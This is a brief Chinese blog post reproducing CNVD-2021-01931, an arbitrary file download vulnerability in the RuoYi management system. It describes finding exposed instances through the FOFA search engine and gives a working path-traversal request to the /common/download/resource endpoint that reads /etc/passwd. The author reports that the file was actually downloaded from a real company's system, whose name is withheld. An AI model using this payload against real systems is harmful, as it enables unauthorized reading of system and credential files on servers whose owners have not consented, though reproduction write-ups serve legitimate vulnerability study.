若依管理系统resource任意文件下载漏洞-CNVD-2021-01931

在fofa上寻找若依管理系统

因为暴露某公司信息  不便展示

访问如下抓包路径:

 /common/download/resource?resource=/profile/../../../../etc/passwd

 

 实际上已经下载保存一个隐私文件passwd

 

 复现完毕。

posted @ 2022-05-09 13:37  我就去睡觉  阅读(1173)  评论(0编辑  收藏  举报